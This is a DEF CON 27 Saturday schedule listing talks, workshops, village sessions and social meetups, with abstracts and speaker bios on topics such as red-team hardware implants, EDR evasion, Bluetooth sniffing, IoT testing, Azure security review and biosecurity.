 Phishing seems easy enough, but getting successful results can be difficult. In this talk we'll walk through practical tips for getting better responses. We'll talk about target selection, ruse development, technology deployment, and suggestions for working with clients to maximize the value of the assessment.

About Nathan Sweaney: Nathan works for Secure Ideas testing pens and consulting clients. He's been in the infosec industry for a decade or so working with a wide range of clients and technologies. He's regularly told that he takes all of the fun out of things and is eager to argue about politics and religion. Hailing from the great state of Oklahoma, he hopes you'll all keep flying over it & leave us alone. Twitter: @sweaney


Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 2 - Saturday - 10:00 - 11:50


CIRCO: Cisco Implant Raspberry Controlled Operations

Saturday from 10:00 – 11:50 in Sunset 2 at Planet Hollywood
Audience: Offense, Hardware

Emilio Couto

Designed under Raspberry Pi and aimed for Red Team Ops, we take advantage of “Sec/Net/Dev/Ops” enterprise tools to capture network credentials in a stealth mode. Using a low-profile hardware & electronics camouflaged as simple network outlet box to be sitting under/over a desk. CIRCO include different techniques for network data exfiltration to avoid detection from IDS/IPS or monitoring systems. This tool gathers information and use a combination of honeypots to trick Automation Systems to give us their network credentials! We will build a physical network & infrastructure lab to show how CIRCO works (live demo) Major features for release v1.5 (Aug):

- Allow existing IP-Phone to co-exist with CIRCO
- Eliminate template files (craft all packets)
- Support NTP exfiltration
- Software encrypted via Bluetooth (prevent forensic)
- Self destroy and alarm switch
- Bypass active & passive fingerprinting (NAC)
- Credentials integration into Faraday

https://github.com/ekiojp/circo

Emilio Couto
Emilio Couto (@ekio_jp) is a Security Consultant with more than 20 years of experience in the network and security field. Born and raised in Argentina, he is currently located in Japan where multitasking between language, culture and technologies is a must. Over the last decade focusing mainly on Finance IT and presenting tools in conferences (BlackHat Asia, HITB, AV Tokyo, SECCON and HamaSec) In his spare time he enjoys 3D printing, tinkering electronics and home-made IoT devices.


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 3 - Saturday - 16:00-16:30


Confessions of an Nespresso Money Mule: Free Stuff & Triangulation Fraud

Saturday at 16:00 in Track 3
20 minutes

Nina Kollars Associate Professor Naval War College Strategic and Operational Research Department

Kitty Hegemon

In 2018 I somewhat innocently bought very expensive coffee (Nespresso capsules) online from Ebay. What followed was a series of unexpected additional packages from the manufacturer Nespresso and a lurking suspicion that something had gone terribly--if not criminally--wrong as a result of my purchase. This talk chronicles the obnoxious amounts of obsessive research and tracking that became my new hobby--stalking Nespresso fraudsters and my decidedly non-technical attempts at developing a generic search profile and reporting the fraudsters to anyone who would listen, to include : the persons whose identities had been stolen, Nespresso, Ebay, and the FBI. Ultimately I just ended up with a LOT of coffee; a lingering sense that I had committed several crimes; and no faith left in humanity.

Nina Kollars
Nina Kollars is writing a book about the ways in which hackers contribute to national security. She is a political scientist whose main research is in technological adaptation by users. Kollars is Associate Professor for the Naval War College in the Strategic and Operational Research Department. She conducts research on military weapons and the humans who use them. Largely unsatisfied with sitting still, Kollars has also worked for the Library of Congress' Federal Research Division, the Department of Afro-American Studies at Harvard University, the World Bank, an anti-glare coating factory on the third shift, and volunteers for BSides. She is the former viceroy of the DC strategy group Cigars, Scotch, and Strategy. She is also a certified bourbon steward.

Twitter: @nianasavage


Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 3 - Saturday - 10:00 - 11:50


Cotopaxi: IoT Protocols Security Testing Toolkit

Saturday from 10:00 – 11:50 in Sunset 3 at Planet Hollywood
Audience: IoT, AppSec

Jakub Botwicz

Cotopaxi is a set of tools for security testing of Internet of Things devices using specific network IoT/IIoT/M2M protocols (e.g. CoAP, MQTT, DTLS, mDNS, HTCPCP). These tools will be used by penetration testers or security researchers to identify IoT services and verify security vulnerabilities or misconfigurations. Currently available tools used for security testing, like nmap or OpenVAS, do not support all new IoT protocols. So possibilities to test IoT products and discover such devices in tested networks are limited. We are working to fill this gap with Cotopaxi toolkit. Main features of our toolkit are:

- Checking availability of network services for supported IoT protocols at given IPs and port ranges ("service ping")
- Recognizing the software used by remote network server ("IoT software fingerprinting") based on responses for given messages using machine learning classifier
- Discovering resources identified by given URLs ("dirbusting")
- Performing black-box fuzzing of IoT protocols based on corpus of packets prepared using coverage-based fuzzer
- Identifying known vulnerabilities in IoT servers
- Detecting network traffic amplification.

New features in release for Defcon27 are:

- client-side versions of protocol fuzzer and vulnerability tester
- support for new protocols: SSDP and HTCPCP.

https://github.com/Samsung/cotopaxi

Jakub Botwicz
Jakub Botwicz works as a Principal Security Engineer at the Samsung Poland R&D Center leading a team of security researchers. He has more than 15 years of experience in information security and previously worked in one of the worlds leading payment card service providers, Big4 consulting company and vendor of network encryption devices. Jakub holds a PhD degree from the Warsaw University of Technology and multiple security community certificates including: GWAPT, CISSP, ECSA. Currently, he works providing security assessments (static and dynamic analyses) of different mobile and IoT components. His hobbies are rock climbing and mountaineering (especially on volcanoes!).


Return to Index    -    Add to    -    ics Calendar file

 

ICS - Bally's Event Center - Saturday - 13:30-13:59


CRASHOVERRIDE: Re-Assessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack

August 10, 2019 1:30 PM

In this presentation I will walk you through the EtherNet/IP frame and show some of the hidden gems within. Particularly, I will focus on the Allen-Bradley Micrologix controllers and how they communicate over EtherNet/IP. There will be live attacks showing vulnerabilities I discovered recently, including password retrieval, password bypass, remote crash, memory erase, and others. Welcome to 1998!

Speaker Information

Panelist Information

Joe Slowik

Dragos

Joe Slowik current hunts ICS-targeting adversaries at Dragos. Prior to this, Joe ran the incident response team at Los Alamos National Laboratory and served as an Information Warfare Officer in the US Navy.


Return to Index    -    Add to    -    ics Calendar file

 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 16:00-16:45


4:00 PM: Cyberbiosecurity & the "Full Stack Biotechnologist"
Speaker: Steve Lewis

Abstract: At the intersection of Biotechnology and Technology there are emerging information and biosecurity (Cyberbiosecurity) considerations worth exploring in the context of design, manufacturing, automation, and AI. Never before in history has an individual had the opportunity to learn such a diverse range of skills. This presentation explores the intersections of the worlds most advanced (bio)technologies in the context of Cyberbiosecurity and the myriad tools of the full stack biotechnologist

Speaker Bio: Steve works for Merrick & Company supporting Department of Homeland Security with biosecurity and laboratory operational planning for the National Bio and Agro-defense Facility. He holds an M.S. in Biotechnology from Johns Hopkins and is a member of the Inworks community bio lab, in Denver, CO

T: @dontmindsteve

Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Paris - Lobby Bar, under the blue thing - Saturday - 19:00-21:59


Title:
Dallas Hackers Party


Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Planet Hollywood - Suite TBA - Saturday - 20:00-24:59


Title:
DC801 Party

@DC801

Return to Index    -    Add to    -    ics Calendar file

 

RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 10:50-11:30


COMPREHENSIVE TALK

DECEPTICON: OPSEC to Slow the OSINT

1050 - 1130


Return to Index    -    Add to    -    ics Calendar file

 

Meetups - Paris - Outside at base of Eiffel Tower - Saturday - 06:00-06:59


Title:
DEFCON 27 4X5K run

DEF CON 27 Let's go for a run 4X5K Announcement
The 4X5K is returning to DefCon 27. Come running, because maybe you like your mornings sweaty! 0530 is the perfect time to either wind down your evening or start up your day! 0600 is of course the coolest time for a run in Vegas (It's only 80!) But who really cares, running is fun, let's go for a run!

Meet up at 0600 (6 AM) at the base of the Paris Hotel and Casino Eiffel tower outside on Thursday-Sunday (8/9-8/12/2019) for 5.1K fun run. Run departs at 0610. We've got two pace groups. The fast group is for people that run an average pace of around 9:00-minute miles or better. If you run slower than an average pace of 9:00-minute miles you're in the not fast group. This is basically so everyone ends up in the same place at the end. At either pace, do it all four days and it's a half marathon (21K).

Routes will vary but will mostly likely be strip-centric. Printed route maps will be displayed before the run.

Safety Brief: It's Vegas, weird stuff will happen, it always does. Be aware that wet concrete is super slippery, broken glass is not your friend, and randos abound! If people harass you, just keep running. You are fast, and they are lame. Some random people may want to join in. This is cool, until it's not. Watch for traffic along the route. It's going to be hot. Hydrate before, during, and after. There can be a surprising number of stairs to climb on these runs, especially when we run south along the strip. Help each other out. Don't die.

The organizers (of which there are very few) are interested in talking to sponsors and past attendees about how we can awesome up this event. We're looking at you, fitness tracker companies: maybe we'll stop dropping 0days if you buy us some water and bananas.

I will see you there.

Follow @Agent __ X __ & @whereiskurt on Twitter for updates, and follow the hashtag #DEFCON4X5K
DEF CON 27 Let's go for a run 4X5K Announcement

Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Paris - Chateau Nightclub - Saturday - 21:00-26:59


Title:
DEFCON Monero Party

In 2017 and 2018, the Monero Enterprise Alliance reached out to the privacy lovers of Defcon and hosted an open house for a few hundred friends and supporters. That party sparked the 2018 Defcon BCOS/Monero Village, which lead to 2019 MoneroKon. Now, the 2019 Monero Village and @BCOSvillage are their own separate villages at Defcon 27. Originally, I just wanted to get people together for a drink. :) But people keep wanting to celebrate, so here we go again!
. . .
Full Anouncement and DJ scheduleHERE
Return to Index    -    Add to    -    ics Calendar file

 

Meetups - Bally's - Chillout room near Vendor Area - Saturday - 13:00-14:59


Title:
DEFCON Sticker Swap

DEF CON Sticker Swap
The Very Unofficial @defcon Sticker Swap will be held at Ballys in the chillout room adjacent to the vendor area Saturday, 1-3pm.

We have some stickers to hand out, but were counting on you to show up with your own! #DIY #stickerlife @dcstickerswap

Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 2 - Saturday - 12:00-12:45


Defeating Bluetooth Low Energy 5 PRNG for Fun and Jamming

Saturday at 12:00 in Track 2
45 minutes | Demo, Tool

Damien Cauquil (virtualabs) Senior Security Researcher @ Econocom Digital.Security

Bluetooth Low energy version 5 has been published in late 2016, but we still have no sniffer supporting this specific version (and not that much compatible devices as well). The problem is this new version introduces a new channel hopping algorithm that renders previous sniffing tools useless as devices can no longer be attacked and connections analyzed. This new algorithm is based on a brand new pseudo-random number generator (PRNG) to provide better collision avoidance while kicking out all of our good old sniffing tools.

Unless some random hacker manages to break this not-that-strong PRNG and upgrades his BLE sniffing tool to support this algorithm ;). In this talk, we will explain why this PRNG is vulnerable and how it can be easily defeated to sniff and jam communications between two BLE 5 devices. A new version of BtleJack will be released during this talk, providing an efficient way to sniff BLE 5 connections to our fellow IoT hacker family.

Damien Cauquil (virtualabs)
Damien is a senior security researcher who joined Digital Security in 2015 as the head of research and development. He discovered how wireless protocols can be fun to hack and quickly developed BtleJuice, one of the first Bluetooth Low Energy MitM framework, and BtleJack, a BLE swiss-army knife released in 2018.

Damien presented at various security conferences including DEF CON, Hack In Paris, Chaos Communication Camp, Chaos Communication Congress, BruCon, Hack.lu, anda dozen times at Nuit du Hack, one of the oldest French hacking conference.

Twitter: @virtualabs


Return to Index    -    Add to    -    ics Calendar file

 

RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 15:10-15:50


COMPREHENSIVE TALK

Derevolutionizing OS Fingerprinting: the cat and mouse game

1510 - 1550


Return to Index    -    Add to    -    ics Calendar file

 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 19:00-19:59


7:00 PM: Digital Medicine 101
Speaker: Jen Goldsack

Abstract: Technology is changing how we practice medicine. Sensors and wearables are getting smaller and cheaper, and algorithms are becoming powerful enough to predict medical outcomes. Yet despite rapid advances, healthcare lags behind other industries in truly putting these technologies to use. A major barrier to entry is the cross-disciplinary approach required to create such tools, requiring knowledge from many people across many fields. The talk aims to drive the field forward by unpacking that barrier, providing a "myth busting" session of the core concepts and terms that define digital medicine. The talk will use cartoons (woot!) to outline concepts the security, ethical, regulatory, and legal issues developers must consider as digital medicine products go to market.

Speaker Bio: Jen Goldsack is the Executive Director of the Digital Medicine Society (DiMe). Jen spent several years at the Clinical Trials Transformation Initiative (CTTI) -- a public private partnership cofounded by Duke and the FDA -- where she led development and implementation several projects within CTTIs Mobile Program and was the operational co-lead on the first randomized clinical trial using FDAs Sentinel System. Jen spent five years working in research at the Hospital of the University of Pennsylvania, first in Outcomes Research in the Department of Surgery and later in the Department of Medicine. More recently, she helped launch the Value Institute, a pragmatic research and innovation center embedded in a large academic medical center in Delaware. Jen earned her masters degree in chemistry from the University of Oxford, England, her masters in the history and sociology of medicine from the University of Pennsylvania, and her MBA from the George Washington University. Additionally, she is a certified Lean Six Sigma Green Belt and a Certified Professional in Healthcare Quality. Ms Goldsack is a retired athlete, formerly a Pan American Games Champion, Olympian and World Championship silver medalist.

T: @_DiMeSociety

Return to Index    -    Add to    -    ics Calendar file

 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 11:00-11:45


11:00 AM: DIY Medicine: The Ethics of Hacking Pharma
Speaker: Alex Pearlman

Abstract: I will present two case studies of groups using biohacking methods to create generic versions of two of the most widely prescribed and most expensive pharmaceuticals in America. I will explain their methods and motivations in the context of the crisis of distributive justice in the US healthcare system. I question the ethics of the the delivery of pharmaceuticals to patients in the US and argue that biohackers are actually acting in a way that is morally acceptable, given the circumstances.

Speaker Bio: Alex Pearlman is a bioethicist and writer and is the Managing Director of the Institute for Ethics of Emerging Technologies. Her research focuses on biohacking, self-experimentation, and access to health technologies. She also writes about emerging policy issues in science for the mainstream press.

T: @lexikon1

Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 5 - Saturday - 12:00 - 13:50


Dr.ROBOT: Organized Chaos and the Shotgun Approach

Saturday from 12:00 – 13:50 in Sunset 5 at Planet Hollywood
Audience: Defense/Offense

Aleksandar Straumann & Jayson Grace

Companies are large, and the number of subdomains they expose is even larger. There are a number of tools to uncover subdomains an organization is exposing, but individually they do not give you the complete picture. In the event that you use multiple tools, you are given an overwhelming amount of data to piece together into an aggregate view. In this talk we introduce Dr.ROBOT, a domain reconnaissance tool that was developed to run a large variety of subdomain enumeration tools. It was designed to trivially incorporate new tools as they are released by leveraging Docker and Ansible. Dr.ROBOT has three stages: gathering, inspection, and publishing. In the gathering stage, it gathers as much information as it can and aggregates the results. In the inspection phase, it captures screenshots and other information regarding the target. Finally, in the publishing phase it sends the data gathered during the previous two phases to an endpoint for manual review. Dr.ROBOT was created to serve as a comprehensive source on subdomain exposure by gathering information from as many resources as possible. It is a versatile utility for bug bounty hunters, blue teams, red teams, and many others.

https://github.com/sandialabs/dr_robot

Aleksandar Straumann
Aleksandar recently received his Masters in Computer Science from the University of Minnesota Duluth. In addition to his studies, he works part time at Sandia National Labs as a graduate intern. He works on various projects involving penetration testing, reverse engineering, and tool development. A security enthusiast, he has also pursued certifications in web penetration testing and offensive security. Aleksandar enjoys practicing his skills with CTFs, developing tools, and working on projects to make the security community better.

Jayson Grace
Jayson Grace is a Security Engineer at Splunk. He holds a BS in Computer Science from the University of New Mexico (2016). He has previously worked as a tool developer, penetration tester, systems administrator, and DevOps Engineer. Passionate about empowering engineers to create secure applications, Jayson also enjoys hunting for 0-days, automating offensive security processes, and strongly believes that in-house offensive security researchers are essential to maintaining a secure environment.


Return to Index    -    Add to    -    ics Calendar file

 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 12:30-14:30


12:30 PM: Dr/Hacker Panel
Speakers:
Dr. Harish Manyam
Hussein Syed
Dr. Dale Yoo

Abstract: Evaluating the clinical impact of a vulnerability has significant implication on how the vulnerabilities is handled both pre and post disclosure including how it is communicated to physicians and patients. Open and transparent communication between the clinical and security researcher communities is essential to ensure that researchers understand the impact that medical device vulnerabilities will have on patient health and safety and clinicians have a better understanding of security implications to be able to recommend an appropriate response for their patients. This panel which includes medical security researchers and practicing physicians and healthcare technologists will discuss the challenges of evaluating the clinical impact of medical device technologies and the opportunities for researchers and healthcare processionals to work more closely together.

Speaker Bio:
Dr. Manyam received his training at Case Western Reserve University Hospitals (2012-2014) and stayed there as faculty and Assistant Professor of Medicine from 2013-2016. He served as the Head of the Lead Extraction Program at University Hospitals Case Western Reserve prior to jointing the UT Cardiology group. He serves as the Director of Cardiovascular Research and the Head of the Atrial Fibrillation Center at Erlanger. He is actively involved with multiple research trials including monitoring the recurrence of atrial fibrillation, optimizing programing options in patients with biventricular defibrillators, and the assessment of lead extraction risk. He has extensive experience in complex ablation (atrial fibrillation and ventricular tachycardia), laser lead extraction, and device implantation.

Hussein Syed is the VP/CISO at RWJBarnabas Health System, an integrated healthcare delivery network in New Jersey. He is responsible for the organization's information security program. Hussein and his team are responsible for security management planning and execution to align with the strategic goals of the health system. Hussein has more than 25 years of experience in IT, of which 17 years are in information security. He has spoken and participated at various security events, RSA, Evanta, HIMSS, and Gartner.

Dr,. Dale Yoo attended the University of Pennsylvania in Philadelphia for his undergraduate degree program with honors. He attended medical school at the University of Texas Health Science Center, San Antonio, TX. He completed h9is residency in Internal Medicine and his fellowships in Cardiovascular Disease, Cardiac Electrophysiology Research and Clinical Cardiac Electrophysiology all from Emory University in Atlanta, GA. Dr. Yoo is proficient in all aspects of Electrophysiology including atrial fibrillation ablation, atrial flutter and PSVT ablation, ventricular tachycardia ablation, as well as complex congenital heart disease management and ablation. In addition, he implants pacemakers, defibrillators and cardiac resynchronization therapy devices. He is also one of only a handful of physicians trained to perform laser lead extraction in the Dallas area. Dr. Yoo not only practices electrophysiology, but he is also board certified in Nuclear Cardiology and proficient in advanced heart failure management. He is also quite involved with clinical research and has developed and patented a post-operative atrial fibrillation drug.

Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Planet Hollywood - Mezzanine Stage - Saturday - 22:00-23:59


Title:
Drunk Hacker History

Its official. Drunk Hacker History will back at @defcon for a 5th fabulous year!!!
Truthfully, we didnt think our livers would last this long.
Time to start preparing and developing a tolerance to those feats of strength!

Return to Index    -    Add to    -    ics Calendar file

 

Meetups - Planet Hollywood - Mezzanine Stage - Saturday - 11:00-12:59


Title:
dstruction

No description available
Return to Index    -    Add to    -    ics Calendar file

 

CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 13:00-13:45


Speaker: Tanya Janca & Teri Radichel

Twitter: @SheHacksPurple

Twitter: @TeriRadichel

Abstract: PenTesters, Blue & Red teamers, network admins and cloud enthusiasts, this talk will layout from start to finish how to verify the security of your Azure implementation. This talk will be 80%+ demos of where to look, what to do, and how to prioritize what you find. Topics include: Azure Security Center, setting scope, setting policy, threat protection, more.

Detailed Outline: There are two articles as well as a video we will share at the end to give the audience more information and a checklist of how they can assess their own Azure instances after the talk is over.

Here is the outline of what we plan to cover in this session:
Do not test the Azure Infrastructure. That is violation of the user agreement for Azure and will get you into hot water with Microsoft. No one wants that.
Be extremely careful to only test things that are IN SCOPE for your client.
Is Azure Security Center turned on? If not, turn it on. I ❤ ASC.
Do all subscriptions/sub-subscriptions have it on? Do you have complete coverage? If not, definitely report it.
Is there a policy set (settings that the org has chosen as “secure”, such as all storage must be encrypted at rest)? If so, what are the settings? Do they look good? Also, what level of compliance do they have? Everything that is not compliant should be reported.
Is threat protection (storage and databases only), monitoring and auditing set up on every possible resource? If not, report it.
Look at the network, in the same way you would look at a traditional network, is anything out of place? Also, are they doing Zoning or Zero-trust or something else? Which network security model are they using? Make sure they are compliant with their own plan. Ask them what their plan is for their network to start. If they don't have an answer, that's another issue altogether.
Do they have “just in time” (JIT) set up on all ports on all servers/VMs? Or are they using a JumpBox to access VMs from outside Azure? Or is that not allowed at all? They should use JIT and Network Security Groups (NSGs)for *everything*.Do they have app whitelisting enabled on VMs? It's called Adaptive Application Controls, and it's right underneath JIT in the security center (ASC) menu, under “Advanced Cloud Defense”. They should have that turned on for *all* servers.Are they using a SIEM (Security incident and event management system)? Are they using it well? Are they monitoring it? What kind of coverage is it getting? Does ASC feed into it? It should.
Are they using a WAF (Web Application Firewall)? If so, test it. If they aren't, mark it as advice for improvement.Any other 3rd party security tools (IPS/IDS/HIPS/Other)? If so, are those getting complete coverage of all assets that are covered by this test? And are they configured well?
Look in “Recommendations” tab of Azure Security Center and it will tell you all the problems (network issues, config errors, missing patches, more) that you haven't spotted yet. 😊 Really, you could likely start here. This is a list of everything that is not compliant with your policy, in order of importance.
If you are assessing web apps within Azure, APIs and functions (serverless), that's a whole other topic, but all of the regular security testing rules would apply, Azure or not.
If your org is using Azure DevOps I suggest adding several security tests to your pipeline including Azure Secure DevOps Kit. It's strict; you likely won't pass the first few times around, so prepare your developers for a bit of disappointment. There are a TON of great security tools in the Azure Marketplace, add a few, one is not enough.Turn on VA for SQL DataBases as part of the Azure Threat Protection, and kick off a scan right away to see if anything is happening. It will likely had a lot of advice for you.
Look in the Threat Detection part of Security Centre, verify that there are no active attacks happening or recent ones, investigate accordingly.

About Tanya: Tanya Janca, also known as SheHacksPurple, is a senior cloud advocate for Microsoft, specializing in application and cloud security; evangelizing software security and advocating for developers and operations folks alike through public speaking, her open source project OWASP DevSlop, and various forms of teaching via workshops, blogs, public speaking and community events. As an ethical hacker, OWASP Project Leader, Women of Security (WoSEC) chapter leader, software developer and professional computer geek of 20+ years, she is a person who is truly fascinated by the 'science' of computer science.

About Teri: Teri has helped 1000's of companies with cloud security through consulting, writing, research, and training. She moved a web hosting business to the cloud and then started the Seattle AWS Architects and Engineers Meetup in 2013 which now has over 2500 members. She was on the original team that helped Capital One move production workloads to AWS. Another company recruited her to help them move to the cloud. She led a team of 30 people in two countries, architected a SAAS IOT solution on AWS and delivered a secure CI/CD pipeline based on her whitepaper, Balancing Security and Innovation with Event Driven Automation. She then moved into security research, writing articles for publications such as Dark Reading and Infosecurity Magazine and reverse engineering malware. When someone told her packet capture was not possible in the cloud, she wrote a white paper Packet Capture on AWS proving that it was.
Teri has presented on cloud security at major security conferences including RSA, AWS re:Invent, Countermeasure, SANS Networking, SANS Cloud Summit, and BSides. She is an IANS Faculty member and received the SANS Differences Makers Award for security innovation. Teri has 25 years of professional technical experience including software architecture and engineering, cyber security, and business operations. She was on the initial SANS cloud security advisory board and provided information and updates for SANS cloud curriculum. She taught the cloud security class for SANS Institute in 2018. She holds a business degree from the University of Washington, a Master of Software Engineering from Seattle University, and is currently finishing a Master of Information Security Engineering from SANS Institute. She got started with computers when she taught herself to program on a TI99/4A when she was 12 years old.


Return to Index    -    Add to    -    ics Calendar file

 

CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 16:00-16:59


Easy PAKE Oven

No description available


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 4 - Saturday - 10:00-10:45


EDR Is Coming; Hide Yo Sh!t

Saturday at 10:00 in Track 4
45 minutes | Demo, Tool

Michael Leibowitz Principal Troublemaker

Topher Timzen (@TTimzen), Principal Vulnerability Enthusiast

There’s a new, largely unaddressed threat in the security industry today, Endpoint Detection and Response (EDR), which aims to stop threat actors in their tracks. The scenario plays out like this... At first your campaign is going well and your attacker objectives are being met. Then, your lovingly crafted payloads become analyst samples, you’re evicted from the environment and you lose your persistence. You and the analyst are now having a bad time. You may feel this is just fear mongering, but we assure you, the risk is real.Fortunately, we have a few new tricks up our sleeves to keep this nightmare scenario at bay. While many would have you believe that we live in a measured and signed boot Utopia on modern systems, we will show you the seedy underbelly of this Brave New World. By abusing early boot mechanisms and UEFI platform firmware, we are able to evade common detection. By showing up early to the fight, we sucker punch EDR, leaving it in a daze unable to see our malicious activities. We put a new twist on old code injection techniques and maintain persistence in UEFI firmware, making an effective invisibility cloak. By leveraging these two techniques, you and the analyst can have a happy and relaxing evening. From that point on - the good ol’ days are back again! Plunder away!

Michael Leibowitz
Michael (@r00tkillah) has done hard-time in real-time. An old-school computer engineer by education, he spends his days hacking the mothership for a fortune 100 company. Previously, he developed and tested embedded hardware and software, fooled around with strap-on boot roms, mobile apps, office suites, and written some secure software. On nights and weekends he hacks on electronics, writes CFPs, and contributes to the NSA Playset.

Twitter: @r00tkillah

Topher Timzen
Topher Timzen (@TTimzen) is currently a Principal Vulnerability Enthusiast and enjoys causing constructive mischief. Topher has spoken at conferences such as DEF CON, SecTor and BSidesPDX on offensive security research. Enjoying teaching, particularly about exploitation, he has been running the CTF at BSidesPDX for the past few years. Topher is located in the woods hiking or mountain biking when not computing. Collectively they have pretended to be bears, slayed a dragon or two, and have managed to not bring down a production server (for long). In reality, they just want to write malware.

Twitter: @Ttimzen


Return to Index    -    Add to    -    ics Calendar file

 

ETV - Flamingo - 3rd Floor - Reno II Room - Saturday - 14:00-14:59


Title:
Ethical Issues In Cyber Attribution


Return to Index    -    Add to    -    ics Calendar file

 

BTVT - Flamingo - 3rd Floor- Savoy Room - Saturday - 17:00-17:30


Extending Zeek For ICS Defense

Saturday 17:00, Savoy Ballroom, Flamingo (Blue Team Village) (30M)

@v4tl4 currently works as a security engineer. He has spent the last three years developing signatures for detecting threats on the network. Prior to that he was a SOC analyst.

@jamesdickenson has worked as a security engineer for five years focusing on detection engineering, threat intel and network security monitoring.

Industrial Control System(ICS) protocols are often neglected in the realm of network security monitoring. Detecting, parsing, and finding malicious activity can be frustrating and time consuming. In this session we will share our learning experiences building detections and protocol parsers in Zeek. We will discuss how ICS protocols can be parsed by using Zeek network security monitor to hunt for malicious patterns and generate detections for your Security Information and Event Management(SIEM) tools. This talk is for those that have ICS protocols in their environments and want greater insight into ICS network traffic.


Return to Index    -    Add to    -    ics Calendar file

 

RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 11:30-11:55


LIGHTENING TALK

Finding the needle in the twitter haystack.

1130 - 1155


Return to Index    -    Add to    -    ics Calendar file

 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 11:45-12:30


11:45 AM: Forensic Science and Information Security: Lifetime Lovers, Part-time Friends
Speaker: Najla Lindsay

Abstract: Forensic Science and Information Security are very parallel fields. They are both methodical in nature and often one area builds succinctly on top of the other. With the ability to have a specialty in various areas, it is interesting that the two do not often merge together and share policies and procedures. You see Forensic Scientists often are called in at the endpoint. Usually, it is at the scene of a crime, only giving the final product and must work backwards to build a story for what initially happened. In Information Security, with the rapid growth of exposure to data, specifically PHI, it is evident that it would be beneficial for both communities to work together. With my area of extended knowledge and expertise in Forensic and Clinical Toxicology, I am often met with various attempts to social engineer me out of patient results to having sent incorrect reports to clients (not on purpose of course). In a Toxicology lab, whether government (local, state or federal) or private, PHI is the utmost important issue. Scientists adhere to the policies and procedures of the SCIENTIFIC aspect of the organization, but not always to the INFORMATION SECURITY aspect of the organization. Lets chat a little about how to make both industries more aware how they are really Lifetime Lovers and Part-time Friends


Speaker Bio: Najla is a Penn State Grad with a technical background in Forensic Science. She works in the area of Forensic & Clinical Toxicology, more specifically drug testing for various specimen types (urine, blood and oral fluid). She is a criminal show junkie, avid thrill seeker and traveler and wine explorer. She is currently transitioning into the hacking specialty of security and labels herself as Pentester Neophyte. You can follow her journey on twitter using these hashtags: #ToxicologyToOSCP and #ScientistToHacker. Her website/blog, forensicsandinfosec.tech is focused on forensics and information security.
T: @teamvega

Return to Index    -    Add to    -    ics Calendar file

 

Meetups - Planet Hollywood - Santa Monica 4 Room - Saturday - 12:00-12:59


Title:
Friends of Bill W.

For all those Friends of Bill W. looking for a meeting or just a quiet moment to regroup, we have you covered with meetings throughout #DEFCON - Noon & 5pm Thurs-Sat, Noon Sun. The location is SANTA MONICA 4 in Planet Hollywood.
Return to Index    -    Add to    -    ics Calendar file

 

Meetups - Planet Hollywood - Santa Monica 4 Room - Saturday - 17:00-17:59


Title:
Friends of Bill W.

For all those Friends of Bill W. looking for a meeting or just a quiet moment to regroup, we have you covered with meetings throughout #DEFCON - Noon & 5pm Thurs-Sat, Noon Sun. The location is SANTA MONICA 4 in Planet Hollywood.
Return to Index    -    Add to    -    ics Calendar file

 

RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 15:50-16:15


LIGHTENING TALK

From email address to phone number

1550 - 1615


Return to Index    -    Add to    -    ics Calendar file

 

BCV - Flamingo 3rd Floor - Laughlin III Room - Saturday - 11:10-11:35


FumbleChain: A Purposefully Vulnerable Blockchai

No description available


Return to Index    -    Add to    -    ics Calendar file

 

Workshops - ( Sold Out ) - Flamingo - Lower Level - Valley of Fire II - Saturday - 10:00-13:59


Functional Programming for the Blue Team

Saturday, 1000-1400 in Flamingo, Valley of Fire II

eigentourist Software Engineer, Data Scientist

This is an introduction to functional programming concepts. It's not an intro to a language or a tool, but to a set of ideas. It's a powerful one for any hacker to learn, but especially for blue teamers who find themselves writing or maintaining increasingly complex code. Practicing it can help defenders write safer code that scales well.

Why speak particularly toward blue team?

Defenders are often unsung heros today. Blue teamers, like system admins, may find themselves writing code to glue things together, fill in the gaps between existing tools, or make up for lack of tools altogether. If your codebase evolves into a critical system, the work of managing its rising complexity can become a serious challenge. Defense is hard, and studying the esoterics of software architecture can be a rare luxury (or an exercise in frustration, depending on your situation.) This workshop aims to hand you the distilled, demystified truth, sans the cryptic terminology. We will collectively build some code that illustrates the philosophy of the functional paradigm, and has a good chance of being useful in your work.

Why functional programming?

This is a paradigm from the days of Lisp and the original generation of MIT hackers. After decades of obscurity, it is moving into the mainstream because it answers two serious problems particularly well: rising code complexity, and the need to support parallelism. Any parts of it that you take away from this workshop are likely to improve your quality of life as a software engineer.

For this workshop, we will choose two programming languages to work with: one for comfort, and one for stretching. Python will be the comfort language, because of its widespread use in many fields. Haskell will be the stretch language, and no one is expected to try it if they're not comfortable. What we want is for you to get a sense of how the functional approach looks, not just in a mainstream language like Python, but also in a language built especially with the functional style in mind.

Skill Level Intermediate

Prerequisites: Some CS fundamentals are helpful, but anyone who has written code as part of their job should be able to walk away with something of value. We won't be using the arcane vocabulary associated with this field, except in the tiniest of amounts, until we begin to talk theory at the end. We don't do theory until everyone has had experience of success writing code based on the concepts.

Materials: .- A laptop that can last A good three hours on battery under light/medium workload (or else the good fortune to sit near A power outlet.) - Your operating system of choice with Your preferred text editor ready to go

Max students: 35

Registration: https://www.eventbrite.com/e/functional-programming-for-the-blue-team-valley-of-fire-ii-tickets-63998222406
(Opens 8-Jul-19)

eigentourist
